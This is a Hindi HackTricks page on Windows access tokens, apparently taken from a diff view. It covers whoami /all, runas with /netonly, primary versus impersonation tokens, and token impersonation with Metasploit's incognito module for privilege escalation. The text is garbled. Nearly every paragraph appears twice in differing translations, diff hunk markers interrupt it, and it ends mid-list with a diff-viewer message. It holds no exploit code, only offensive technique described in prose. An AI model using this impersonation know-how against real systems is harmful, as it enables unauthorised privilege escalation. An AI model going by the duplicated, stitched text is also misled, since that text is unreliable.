* **अपने हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**.
</details>
## पहुंच टोकन
## एक्सेस टोकन्स
प्रत्येक **उपयोगकर्ता जिसने सिस्टम पर लॉग इन किया है**, उसके पास उस लॉगइन सत्र के लिए सुरक्षा सूचना के साथ एक पहुंच टोकन होता है। सिस्टम उपयोगकर्ता लॉग इन करते समय एक पहुंच टोकन बनाता है। **प्रत्येक प्रक्रिया** जो उपयोगकर्ता के नाम पर **चलाई जाती है**, उसके पास एक पहुंच टोकन की प्रतिलिपि होती है। टोकन उपयोगकर्ता को पहचानता है, उपयोगकर्ता के समूहों को पहचानता है, और उपयोगकर्ता की विशेषाधिकारों को पहचानता है। टोकन में एक लॉगइन SID (सुरक्षा पहचानक) भी होता है जो वर्तमान लॉगइन सत्र की पहचान करता है।
**प्रत्येक उपयोगकर्ता** जो सिस्टम **में लॉग इन होता है, उसके पास सुरक्षा सूचना के साथ एक्सेस टोकन होता है**। सिस्टम एक एक्सेस टोकन बनाता है जब उपयोगकर्ता लॉग इन करता है। **उपयोगकर्ता के प्रतिनिधित्व में किये गए प्रत्येक प्रक्रिया के पास एक्सेस टोकन की एक प्रति होती है**। टोकन उपयोगकर्ता, उपयोगकर्ता के समूह, और उपयोगकर्ता की विशेषाधिकारों की पहचान करता है। एक टोकन में वर्तमान लॉग इन सत्र की पहचान करने वाला लॉग ऑन एसआईडी (सुरक्षा पहचानकर्ता) भी होता है।
आप इस सूचना को `whoami /all` को निष्पादित करके देख सकते हैं
आप इस सूचना को देख सकते हैं `whoami /all` का निष्पादन करके
```
whoami /all
@ -60,58 +60,34 @@ SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
```
या तो _प्रक्रिया एक्सप्लोरर_ का उपयोग करके साइंटर्नल्स से (प्रक्रिया का चयन करें और "सुरक्षा" टैब तक पहुंचें):
या _प्रक्रिया एक्सप्लोरर_ से सिसटर्नल्स (प्रक्रिया का चयन करें और "सुरक्षा" टैब तक पहुंचें):
![](<../../.gitbook/assets/image (321).png>)
### स्थानीय प्रशासक
जब स्थानीय प्रशासक लॉगिन करता है, **दो पहुंच टोकन बनाए जाते हैं**: एक वाणिज्यिक अधिकारों वाला और दूसरा सामान्य अधिकारों वाला। **डिफ़ॉल्ट रूप से**, जब यह उपयोगकर्ता कोई प्रक्रिया चलाता है, तो **सामान्य** (गैर-प्रशासक) **अधिकार वाला उपयोग होता है**। जब यह उपयोगकर्ता किसी भी प्रशासक के रूप में कुछ भी **चलाने** की कोशिश करता है ("एडमिनिस्ट्रेटर के रूप में चलाएं" उदाहरण के लिए), तो **UAC** अनुमति के लिए पूछने के लिए उपयोग होगा।\
यदि आप [**UAC के बारे में और अधिक जानना चाहते हैं तो इस पृष्ठ को पढ़ें**](../authentication-credentials-uac-and-efs.md#uac)**.**
जब एक स्थानीय प्रशासक लॉगिन करता है, **दो एक्सेस टोकन बनाए जाते हैं**: एक विशेषाधिकारों वाला और दूसरा सामान्य अधिकारों वाला। **डिफ़ॉल्ट** रूप से, जब यह उपयोगकर्ता प्रक्रिया निष्क्रिय करता है तो **सामान्य** (प्रशासक नहीं) **अधिकारों वाला उपयोग किया जाता है**। जब यह उपयोगकर्ता किसी भी चीज़ को **प्रशासक के रूप में** चलाने की कोशिश करता है ("प्रशासक के रूप में चलाएं" उदाहरण के लिए) तो **UAC** अनुमति के लिए पूछने के लिए उपयोग किया जाएगा।\
यदि आप [**UAC के बारे में अधिक जानना चाहते हैं तो इस पृष्ठ को पढ़ें**](../authentication-credentials-uac-and-efs.md#uac)****
### प्रमाणपत्र उपयोगकर्ता अनुकरण
### प्रमाणों उपयोगकर्ता प्रतिनिधित्व
यदि आपके पास किसी अन्य उपयोगकर्ता के **वैध प्रमाणपत्र** हैं, तो आप उन प्रमाणपत्रों के साथ एक **नई लॉगऑन सत्र** बना सकते हैं:
यदि आपके पास **किसी अन्य उपयोगकर्ता के मान्य प्रमाण हैं**, तो आप उन प्रमाणों के साथ एक **नया लॉगऑन सत्र बना सकते हैं** :
```
runas /user:domain\username cmd.exe
```
एक्सेस टोकन में **LSASS** के अंदर लॉगऑन सत्र का **संदर्भ** भी होता है, यह उपयोगी होता है अगर प्रक्रिया को नेटवर्क के कुछ ऑब्जेक्ट्स तक पहुंच की आवश्यकता हो।\
आप नेटवर्क सेवाओं तक पहुंच के लिए **विभिन्न क्रेडेंशियल का उपयोग करने वाली प्रक्रिया** चला सकते हैं:
**एक्सेस टोकन** में **LSASS** के अंदर लॉगऑन सत्र का **संदर्भ** भी होता है, यह उपयोगी है अगर प्रक्रिया को नेटवर्क के कुछ ऑब्जेक्ट्स तक पहुंचने की आवश्यकता हो।\
आप नेटवर्क सेवाओं तक पहुंचने के लिए **विभिन्न क्रेडेंशियल का उपयोग करने वाली प्रक्रिया लॉन्च** कर सकते हैं:
```
runas /user:domain\username /netonly cmd.exe
```
यह उपयोगी होता है यदि आपके पास नेटवर्क में ऑब्जेक्ट तक पहुंच के लिए उपयोगी क्रेडेंशियल हैं, लेकिन वे क्रेडेंशियल मौजूदा होस्ट के अंदर मान्य नहीं हैं क्योंकि वे केवल नेटवर्क में उपयोग होंगे (मौजूदा होस्ट में आपकी मौजूदा उपयोगकर्ता विशेषाधिकार का उपयोग किया जाएगा)।
यह उपयोगी है अगर आपके पास नेटवर्क में ऑब्जेक्ट्स तक पहुंचने के लिए उपयोगी क्रेडेंशियल्स हैं, लेकिन वे क्रेडेंशियल्स मौजूदा होस्ट के अंदर मान्य नहीं हैं क्योंकि वे केवल नेटवर्क में उपयोग के लिए होंगे (मौजूदा होस्ट में आपकी वर्तमा उपयोगकर्ता विशेषाधिकार का उपयोग किया जाएगा)।
### टोकन के प्रकार
दो प्रकार के टोकन उपलब्ध होते हैं:
दो प्रकार के टोकन उपलब्ध हैं:
* **प्राथमिक टोकन**: प्राथमिक टोकन केवल **प्रक्रियाओं से संबद्ध किए जा सकते हैं**, और वे प्रक्रिया की सुरक्षा विषय को प्रतिष्ठित करते हैं। प्राथमिक टोकन के निर्माण और उनके प्रक्रियाओं से संबद्ध करने दोनों विशेषाधिकारिता की आवश्यकता होती है - प्राथमिक टोकन का निर्माण आमतौर पर प्रमाणीकरण सेवा द्वारा किया जाता है, और एक लॉगऑन सेवा उपयोगकर्ता के ऑपरेटिंग सिस्टम शैली से इसे संबद्ध करती है। प्रक्रियाएं प्राथमिक टोकन की मूल प्रक्रिया की प्रतिलिपि को आधिकारिक रूप से अनुग्रहित करती हैं।
* **अनुकरण टोकन**: अनुकरण एक सुरक्षा अवधारणा है जो Windows NT में लागू होती है और इसके माध्यम से एक सर्वर एप्लिकेशन को सुरक्षित ऑब्जेक्ट्स तक पहुंच के मामले में अस्थायी रूप से "ग्राहक" के रूप में कार्य करने की अनुमति देती है। अनुकरण के चार संभावित स्तर होते हैं:
* **प्राथमिक टोकन**: प्राथमिक टोकन केवल **प्रक्रियाओं से संबंधित** हो सकते हैं, और वे प्रक्रिया की सुरक्षा विषय का प्रतिनिधित्व करते हैं। प्राथमिक टोकनों की रचना और उनके प्रक्रियाओं से संबंधित करना दोनों विशेषाधिकारित ऑपरेशन हैं, जिसे विशेषधिकार विभाजन के नाम पर दो विशेषाधिकारों की आवश्यकता होती है - सामान्य स्थिति में प्रमाणीकरण सेवा टोकन बनाती है, और लॉगऑन सेवा इसे उपयोगकर्ता के ऑपरेटिंग सिस्टम शैली से संबंधित करती है। प्रक्रियाएँ पहले माता प्रक्रिया के प्राथमिक टोकन की प्रतियांतरण करती हैं।
* **अनुकरण टोकन**: अनुकरण एक सुरक्षा अवधारणा है जो Windows NT में लागू की गई है जो एक सर्वर एप्लिकेशन को सुरक्षित ऑब्जेक्ट्स तक पहुंच के मामले में अस्थायी रूप से "**ग्राहक**" के रूप में "**होने**" की अनुमति देती है। अनुकरण के **चार संभावित स्तर** हैं:
* **अनामक**, जो सर्वर को एक अनामक / अज्ञात उपयोगकर्ता की पहुंच देता है
* **पहचान**, जो सर्वर को ग्राहक की पहचान जांचने देता है लेकिन उस पहचान का उपयोग ऑब्जेक्ट्स तक पहुंच करने के लिए नहीं कर सकता
* **अनुकरण**, जो सर्वर को ग्राहक के पक्ष में कार्य करने देता है
* **प्रतिनिधित्व**, अनुकरण के समान है लेकिन इसे सर्वर कनेक्ट करने के लिए दूरस्थ प्रणालियों तक विस्तारित किया जाता है (प्रमाणों के संरक्षण के माध्यम से)।
ग्राहक सर्वर के रूप में उपलब्ध अधिकतम अनुकरण स्तर (यदि कोई हो) को एक कनेक्शन पैरामीटर के रूप में चुन सकता है। अनुकरण और अनुकरण विशेषाधिकारिता की आवश्यकता होती है (अनुकरण पहले नहीं था, लेकिन ग्राहक API के अनुमति सीमित करने के लिए डिफ़ॉल्ट स्तर को "पहचान" तक सीमित न करने के इतिहासिक लापरवाही के कारण, जिससे एक अनुचित ग्राहक को अनुकरण करने की अनुमति दी जाती है)। **अनुकरण टोकन केवल थ्रेड्स से संबद्ध किए जा सकते हैं**, और वे ग्राहक प्रक्रिया की सुरक्षा विषय को प्रतिष्ठित करते हैं। अनुकरण टोकन आमतौर पर ब्यापार के माध्यम से वर्तमान थ्रेड के लिए स्वतः ही निर्मित और संबद्ध किए जाते हैं, जैसे DCE RPC, DDE और नेम्ड पाइप्स जैसे IPC मेकेनिज़मों द्वारा।
#### अनुकरण टोकन
मेटास्प्लोइट के _**incognito**_\*\* मॉड्यूल\*\* का उपयोग करके यदि आपके पास पर्याप्त विशेषाधिकार हैं, तो आप आसानी से अन्य **टोकनों** की **सूची** और **अनुकरण** कर सकते हैं। यह दूसरे उपयोगकर्ता के रूप में कार्यवाही करने के लिए उपयोगी हो सकता है। इस तकनीक के साथ आप विशेषाधिकारों को भी बढ़ा सकते हैं।
### टोकन विशेषाधिकार
यह जानें कि कौन से **टोकन विशेषाधिकार** विशेषाधिकारों को बढ़ाने के लिए उपयोग किए जा सकते हैं:
{% content-ref url="privilege-escalation-abusing-tokens/" %}
[privilege-escalation-abusing-tokens](privilege-escalation-abusing-tokens/)
{% endcontent-ref %}
[**इस बाहरी पृष्ठ पर सभी संभावित टोकन विशेषाधिकारों और कुछ परिभाषाएं देखें**](https://github.com/gtworek/Priv2Admin)।
## संदर्भ
इस ट्यूटोरियल में टोकन के बारे में और अधिक जानें: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) और [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
<details>
* **अनामित**, सर्वर को एक अनामित/अज्ञात उपयोगकर्ता की पहुंच देना
* **पहचान**, सर्वर को ग्राहक की पहचान जांचने देना लेकिन उस पहचान का उपयोग ऑब्ज

Some files were not shown because too many files have changed in this diff Show more